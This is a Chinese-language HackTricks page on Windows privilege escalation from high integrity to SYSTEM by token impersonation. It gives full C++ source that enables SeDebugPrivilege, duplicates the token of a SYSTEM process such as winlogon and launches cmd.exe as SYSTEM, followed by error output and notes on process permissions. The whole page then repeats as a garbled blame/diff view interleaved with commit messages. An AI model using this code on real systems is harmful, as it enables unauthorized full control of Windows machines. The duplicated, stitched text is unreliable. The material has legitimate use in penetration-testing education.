hacktricks/windows-hardening/windows-local-privilege-escalation/seimpersonate-from-high-to-system.md

<details>

<summary><strong>从零到英雄学习AWS黑客攻击，通过</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>！</strong></summary>

支持HackTricks的其他方式：

* 如果您想在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF**，请查看[**订阅计划**](https://github.com/sponsors/carlospolop)！
* 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family)，我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。

</details>


## 代码

以下代码摘自[这里](https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962)。它允许**指定一个进程ID作为参数**，并且作为指定进程用户运行的CMD将被执行。\
在一个高完整性进程中，您可以**指定一个作为系统运行的进程的PID**（如winlogon, wininit），并以系统身份执行cmd.exe。
```cpp
impersonateuser.exe 1234
```
```cpp
// impersonateuser.cpp 的内容保持不变
```
```cpp
#include <windows.h>
#include <iostream>
#include <Lmcons.h>
BOOL SetPrivilege(
HANDLE hToken,          // access token handle
LPCTSTR lpszPrivilege,  // name of privilege to enable/disable
BOOL bEnablePrivilege   // to enable or disable privilege
)
{
TOKEN_PRIVILEGES tp;
LUID luid;
if (!LookupPrivilegeValue(
NULL,            // lookup privilege on local system
lpszPrivilege,   // privilege to lookup
&luid))        // receives LUID of privilege
{
printf("[-] LookupPrivilegeValue error: %u\n", GetLastError());
return FALSE;
}
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
if (bEnablePrivilege)
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
else
tp.Privileges[0].Attributes = 0;
// Enable the privilege or disable all privileges.
if (!AdjustTokenPrivileges(
hToken,
FALSE,
&tp,
sizeof(TOKEN_PRIVILEGES),
(PTOKEN_PRIVILEGES)NULL,
(PDWORD)NULL))
{
printf("[-] AdjustTokenPrivileges error: %u\n", GetLastError());
return FALSE;
}
if (GetLastError() == ERROR_NOT_ALL_ASSIGNED)
{
printf("[-] The token does not have the specified privilege. \n");
return FALSE;
}
return TRUE;
}
std::string get_username()
{
TCHAR username[UNLEN + 1];
DWORD username_len = UNLEN + 1;
GetUserName(username, &username_len);
std::wstring username_w(username);
std::string username_s(username_w.begin(), username_w.end());
return username_s;
}
int main(int argc, char** argv) {
// Print whoami to compare to thread later
printf("[+] Current user is: %s\n", (get_username()).c_str());
// Grab PID from command line argument
char* pid_c = argv[1];
DWORD PID_TO_IMPERSONATE = atoi(pid_c);
// Initialize variables and structures
HANDLE tokenHandle = NULL;
HANDLE duplicateTokenHandle = NULL;
STARTUPINFO startupInfo;
PROCESS_INFORMATION processInformation;
ZeroMemory(&startupInfo, sizeof(STARTUPINFO));
ZeroMemory(&processInformation, sizeof(PROCESS_INFORMATION));
startupInfo.cb = sizeof(STARTUPINFO);
// Add SE debug privilege
HANDLE currentTokenHandle = NULL;
BOOL getCurrentToken = OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &currentTokenHandle);
if (SetPrivilege(currentTokenHandle, L"SeDebugPrivilege", TRUE))
{
printf("[+] SeDebugPrivilege enabled!\n");
}
// Call OpenProcess(), print return code and error code
HANDLE processHandle = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, true, PID_TO_IMPERSONATE);
if (GetLastError() == NULL)
printf("[+] OpenProcess() success!\n");
else
{
printf("[-] OpenProcess() Return Code: %i\n", processHandle);
printf("[-] OpenProcess() Error: %i\n", GetLastError());
}
// Call OpenProcessToken(), print return code and error code
BOOL getToken = OpenProcessToken(processHandle, MAXIMUM_ALLOWED, &tokenHandle);
if (GetLastError() == NULL)
printf("[+] OpenProcessToken() success!\n");
else
{
printf("[-] OpenProcessToken() Return Code: %i\n", getToken);
printf("[-] OpenProcessToken() Error: %i\n", GetLastError());
}
// Impersonate user in a thread
BOOL impersonateUser = ImpersonateLoggedOnUser(tokenHandle);
if (GetLastError() == NULL)
{
printf("[+] ImpersonatedLoggedOnUser() success!\n");
printf("[+] Current user is: %s\n", (get_username()).c_str());
printf("[+] Reverting thread to original user context\n");
RevertToSelf();
}
else
{
printf("[-] ImpersonatedLoggedOnUser() Return Code: %i\n", getToken);
printf("[-] ImpersonatedLoggedOnUser() Error: %i\n", GetLastError());
}
// Call DuplicateTokenEx(), print return code and error code
BOOL duplicateToken = DuplicateTokenEx(tokenHandle, MAXIMUM_ALLOWED, NULL, SecurityImpersonation, TokenPrimary, &duplicateTokenHandle);
if (GetLastError() == NULL)
printf("[+] DuplicateTokenEx() success!\n");
else
{
printf("[-] DuplicateTokenEx() Return Code: %i\n", duplicateToken);
printf("[-] DupicateTokenEx() Error: %i\n", GetLastError());
}
// Call CreateProcessWithTokenW(), print return code and error code
BOOL createProcess = CreateProcessWithTokenW(duplicateTokenHandle, LOGON_WITH_PROFILE, L"C:\\Windows\\System32\\cmd.exe", NULL, 0, NULL, NULL, &startupInfo, &processInformation);
if (GetLastError() == NULL)
printf("[+] Process spawned!\n");
else
{
printf("[-] CreateProcessWithTokenW Return Code: %i\n", createProcess);
printf("[-] CreateProcessWithTokenW Error: %i\n", GetLastError());
}
return 0;
}
```
{% endcode %}

## 错误

在某些情况下，您可能尝试模拟 System 但它不起作用，显示如下输出：
```cpp
[+] OpenProcess() success!
[+] OpenProcessToken() success!
[-] ImpersonatedLoggedOnUser() Return Code: 1
[-] ImpersonatedLoggedOnUser() Error: 5
[-] DuplicateTokenEx() Return Code: 0
[-] DupicateTokenEx() Error: 5
[-] CreateProcessWithTokenW Return Code: 0
[-] CreateProcessWithTokenW Error: 1326
```
这意味着即使你在高完整性级别运行**你也没有足够的权限**。\
让我们用**进程资源管理器**检查当前管理员对`svchost.exe`进程的权限（你也可以使用进程黑客）：

1. 选择一个`svchost.exe`的进程
2. 右键点击 --> 属性
3. 在"安全"标签页中，点击右下角的"权限"按钮
4. 点击"高级"
5. 选择"管理员"然后点击"编辑"
6. 点击"显示高级权限"

![](<../../.gitbook/assets/image (322).png>)

上图包含了"管理员"对选定进程的所有权限（如你所见，在`svchost.exe`的情况下，他们只有"查询"权限）

看看"管理员"对`winlogon.exe`的权限：

![](<../../.gitbook/assets/image (323).png>)

在该进程内部，"管理员"可以"读取内存"和"读取权限"，这可能允许管理员模拟该进程使用的令牌。


<details>

<summary><strong>从零到英雄学习AWS黑客攻击，通过</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>！</strong></summary>

支持HackTricks的其他方式：

* 如果你想在**HackTricks上看到你的公司广告**或**下载HackTricks的PDF**，请查看[**订阅计划**](https://github.com/sponsors/carlospolop)！
* 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family)，我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享你的黑客技巧。

</details>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
+								<details>
-												Translated ['windows-hardening/active-directory-methodology/ad-certifica

											
										
										
											2024-01-09 14:10:19 +00:00
+								<summary><strong>从零到英雄学习AWS黑客攻击，通过</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>！</strong></summary>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['windows-hardening/active-directory-methodology/ad-certifica

											
										
										
											2024-01-09 14:10:19 +00:00
+								支持HackTricks的其他方式：
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['windows-hardening/active-directory-methodology/ad-certifica

											
										
										
											2024-01-09 14:10:19 +00:00
+								* 如果您想在**HackTricks中看到您的公司广告**或**下载HackTricks的PDF**，请查看[**订阅计划**](https://github.com/sponsors/carlospolop)！
 								* 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com)
 								* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family)，我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
 								* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
 								* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								## 代码
-												GitBook: [master] 2 pages and 2 assets modified
											
										
										
											2020-08-30 22:32:59 +00:00
-												Translated ['windows-hardening/active-directory-methodology/ad-certifica

											
										
										
											2024-01-09 14:10:19 +00:00
+								以下代码摘自[这里](https://medium.com/@seemant.bisht24/understanding-and-abusing-access-tokens-part-ii-b9069f432962)。它允许**指定一个进程ID作为参数**，并且作为指定进程用户运行的CMD将被执行。\
 								在一个高完整性进程中，您可以**指定一个作为系统运行的进程的PID**（如winlogon, wininit），并以系统身份执行cmd.exe。
-												GitBook: [master] 2 pages and 2 assets modified
											
										
										
											2020-08-30 22:32:59 +00:00
+								```cpp
 								impersonateuser.exe 1234
 								```
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								```cpp
-												Translated ['windows-hardening/active-directory-methodology/ad-certifica

											
										
										
											2024-01-09 14:10:19 +00:00
+								// impersonateuser.cpp 的内容保持不变
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								```
-												GitBook: [master] 2 pages and 2 assets modified
											
										
										
											2020-08-30 22:32:59 +00:00
+								```cpp
 								#include <windows.h>
 								#include <iostream>
 								#include <Lmcons.h>
 								BOOL SetPrivilege(
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								HANDLE hToken,          // access token handle
 								LPCTSTR lpszPrivilege,  // name of privilege to enable/disable
 								BOOL bEnablePrivilege   // to enable or disable privilege
-												GitBook: [master] 2 pages and 2 assets modified
											
										
										
											2020-08-30 22:32:59 +00:00
+								)
 								{
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								TOKEN_PRIVILEGES tp;
 								LUID luid;
 								if (!LookupPrivilegeValue(
 								NULL,            // lookup privilege on local system
 								lpszPrivilege,   // privilege to lookup
 								&luid))        // receives LUID of privilege
 								{
 								printf("[-] LookupPrivilegeValue error: %u\n", GetLastError());
 								return FALSE;
 								}
 								tp.PrivilegeCount = 1;
 								tp.Privileges[0].Luid = luid;
 								if (bEnablePrivilege)
 								tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
 								else
 								tp.Privileges[0].Attributes = 0;
 								// Enable the privilege or disable all privileges.
 								if (!AdjustTokenPrivileges(
 								hToken,
 								FALSE,
 								&tp,
 								sizeof(TOKEN_PRIVILEGES),
 								(PTOKEN_PRIVILEGES)NULL,
 								(PDWORD)NULL))
 								{
 								printf("[-] AdjustTokenPrivileges error: %u\n", GetLastError());
 								return FALSE;
 								}
 								if (GetLastError() == ERROR_NOT_ALL_ASSIGNED)
 								{
 								printf("[-] The token does not have the specified privilege. \n");
 								return FALSE;
 								}
 								return TRUE;
-												GitBook: [master] 2 pages and 2 assets modified
											
										
										
											2020-08-30 22:32:59 +00:00
+								}
 								std::string get_username()
 								{
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								TCHAR username[UNLEN + 1];
 								DWORD username_len = UNLEN + 1;
 								GetUserName(username, &username_len);
 								std::wstring username_w(username);
 								std::string username_s(username_w.begin(), username_w.end());
 								return username_s;
-												GitBook: [master] 2 pages and 2 assets modified
											
										
										
											2020-08-30 22:32:59 +00:00
+								}
 								int main(int argc, char** argv) {
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								// Print whoami to compare to thread later
 								printf("[+] Current user is: %s\n", (get_username()).c_str());
 								// Grab PID from command line argument
 								char* pid_c = argv[1];
 								DWORD PID_TO_IMPERSONATE = atoi(pid_c);
 								// Initialize variables and structures
 								HANDLE tokenHandle = NULL;
 								HANDLE duplicateTokenHandle = NULL;
 								STARTUPINFO startupInfo;
 								PROCESS_INFORMATION processInformation;
 								ZeroMemory(&startupInfo, sizeof(STARTUPINFO));
 								ZeroMemory(&processInformation, sizeof(PROCESS_INFORMATION));
 								startupInfo.cb = sizeof(STARTUPINFO);
 								// Add SE debug privilege
 								HANDLE currentTokenHandle = NULL;
 								BOOL getCurrentToken = OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &currentTokenHandle);
 								if (SetPrivilege(currentTokenHandle, L"SeDebugPrivilege", TRUE))
 								{
 								printf("[+] SeDebugPrivilege enabled!\n");
 								}
 								// Call OpenProcess(), print return code and error code
 								HANDLE processHandle = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, true, PID_TO_IMPERSONATE);
 								if (GetLastError() == NULL)
 								printf("[+] OpenProcess() success!\n");
 								else
 								{
 								printf("[-] OpenProcess() Return Code: %i\n", processHandle);
 								printf("[-] OpenProcess() Error: %i\n", GetLastError());
 								}
 								// Call OpenProcessToken(), print return code and error code
 								BOOL getToken = OpenProcessToken(processHandle, MAXIMUM_ALLOWED, &tokenHandle);
 								if (GetLastError() == NULL)
 								printf("[+] OpenProcessToken() success!\n");
 								else
 								{
 								printf("[-] OpenProcessToken() Return Code: %i\n", getToken);
 								printf("[-] OpenProcessToken() Error: %i\n", GetLastError());
 								}
 								// Impersonate user in a thread
 								BOOL impersonateUser = ImpersonateLoggedOnUser(tokenHandle);
 								if (GetLastError() == NULL)
 								{
 								printf("[+] ImpersonatedLoggedOnUser() success!\n");
 								printf("[+] Current user is: %s\n", (get_username()).c_str());
 								printf("[+] Reverting thread to original user context\n");
 								RevertToSelf();
 								}
 								else
 								{
 								printf("[-] ImpersonatedLoggedOnUser() Return Code: %i\n", getToken);
 								printf("[-] ImpersonatedLoggedOnUser() Error: %i\n", GetLastError());
 								}
 								// Call DuplicateTokenEx(), print return code and error code
 								BOOL duplicateToken = DuplicateTokenEx(tokenHandle, MAXIMUM_ALLOWED, NULL, SecurityImpersonation, TokenPrimary, &duplicateTokenHandle);
 								if (GetLastError() == NULL)
 								printf("[+] DuplicateTokenEx() success!\n");
 								else
 								{
 								printf("[-] DuplicateTokenEx() Return Code: %i\n", duplicateToken);
 								printf("[-] DupicateTokenEx() Error: %i\n", GetLastError());
 								}
 								// Call CreateProcessWithTokenW(), print return code and error code
 								BOOL createProcess = CreateProcessWithTokenW(duplicateTokenHandle, LOGON_WITH_PROFILE, L"C:\\Windows\\System32\\cmd.exe", NULL, 0, NULL, NULL, &startupInfo, &processInformation);
 								if (GetLastError() == NULL)
 								printf("[+] Process spawned!\n");
 								else
 								{
 								printf("[-] CreateProcessWithTokenW Return Code: %i\n", createProcess);
 								printf("[-] CreateProcessWithTokenW Error: %i\n", GetLastError());
 								}
 								return 0;
-												GitBook: [master] 2 pages and 2 assets modified
											
										
										
											2020-08-30 22:32:59 +00:00
+								}
 								```
 								{% endcode %}
-												Translated to Chinese

											
										
										
											2023-08-03 19:12:22 +00:00
+								## 错误
-												GitBook: [master] 2 pages and 2 assets modified
											
										
										
											2020-08-30 22:32:59 +00:00
-												Translated ['windows-hardening/active-directory-methodology/ad-certifica

											
										
										
											2024-01-09 14:10:19 +00:00
+								在某些情况下，您可能尝试模拟 System 但它不起作用，显示如下输出：
-												GitBook: [master] 2 pages and 2 assets modified
											
										
										
											2020-08-30 22:32:59 +00:00
+								```cpp
 								[+] OpenProcess() success!
 								[+] OpenProcessToken() success!
 								[-] ImpersonatedLoggedOnUser() Return Code: 1
 								[-] ImpersonatedLoggedOnUser() Error: 5
 								[-] DuplicateTokenEx() Return Code: 0
 								[-] DupicateTokenEx() Error: 5
 								[-] CreateProcessWithTokenW Return Code: 0
 								[-] CreateProcessWithTokenW Error: 1326
 								```
-												Translated ['windows-hardening/active-directory-methodology/ad-certifica

											
										
										
											2024-01-09 14:10:19 +00:00
+								这意味着即使你在高完整性级别运行**你也没有足够的权限**。\
 								让我们用**进程资源管理器**检查当前管理员对`svchost.exe`进程的权限（你也可以使用进程黑客）：
-												GitBook: [master] 2 pages and 2 assets modified
											
										
										
											2020-08-30 22:32:59 +00:00
-												Translated ['windows-hardening/active-directory-methodology/ad-certifica

											
										
										
											2024-01-09 14:10:19 +00:00
+. 选择一个`svchost.exe`的进程
 . 右键点击 --> 属性
 . 在"安全"标签页中，点击右下角的"权限"按钮
 . 点击"高级"
 . 选择"管理员"然后点击"编辑"
 . 点击"显示高级权限"
-												GitBook: [master] 2 pages and 2 assets modified
											
										
										
											2020-08-30 22:32:59 +00:00
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								![](<../../.gitbook/assets/image (322).png>)
-												GitBook: [master] 2 pages and 2 assets modified
											
										
										
											2020-08-30 22:32:59 +00:00
-												Translated ['windows-hardening/active-directory-methodology/ad-certifica

											
										
										
											2024-01-09 14:10:19 +00:00
+								上图包含了"管理员"对选定进程的所有权限（如你所见，在`svchost.exe`的情况下，他们只有"查询"权限）
-												GitBook: [master] 2 pages and 2 assets modified
											
										
										
											2020-08-30 22:32:59 +00:00
-												Translated ['windows-hardening/active-directory-methodology/ad-certifica

											
										
										
											2024-01-09 14:10:19 +00:00
+								看看"管理员"对`winlogon.exe`的权限：
-												GitBook: [master] 2 pages and 2 assets modified
											
										
										
											2020-08-30 22:32:59 +00:00
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								![](<../../.gitbook/assets/image (323).png>)
-												GitBook: [master] 2 pages and 2 assets modified
											
										
										
											2020-08-30 22:32:59 +00:00
-												Translated ['windows-hardening/active-directory-methodology/ad-certifica

											
										
										
											2024-01-09 14:10:19 +00:00
+								在该进程内部，"管理员"可以"读取内存"和"读取权限"，这可能允许管理员模拟该进程使用的令牌。
-												GitBook: [master] 2 pages and 2 assets modified
											
										
										
											2020-08-30 22:32:59 +00:00
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								<details>
-												Translated ['windows-hardening/active-directory-methodology/ad-certifica

											
										
										
											2024-01-09 14:10:19 +00:00
+								<summary><strong>从零到英雄学习AWS黑客攻击，通过</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>！</strong></summary>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['windows-hardening/active-directory-methodology/ad-certifica

											
										
										
											2024-01-09 14:10:19 +00:00
+								支持HackTricks的其他方式：
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['windows-hardening/active-directory-methodology/ad-certifica

											
										
										
											2024-01-09 14:10:19 +00:00
+								* 如果你想在**HackTricks上看到你的公司广告**或**下载HackTricks的PDF**，请查看[**订阅计划**](https://github.com/sponsors/carlospolop)！
 								* 获取[**官方PEASS & HackTricks商品**](https://peass.creator-spring.com)
 								* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family)，我们独家的[**NFTs系列**](https://opensea.io/collection/the-peass-family)
 								* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram群组**](https://t.me/peass) 或在 **Twitter** 🐦 上**关注**我 [**@carlospolopm**](https://twitter.com/carlospolopm)**。**
 								* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享你的黑客技巧。
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>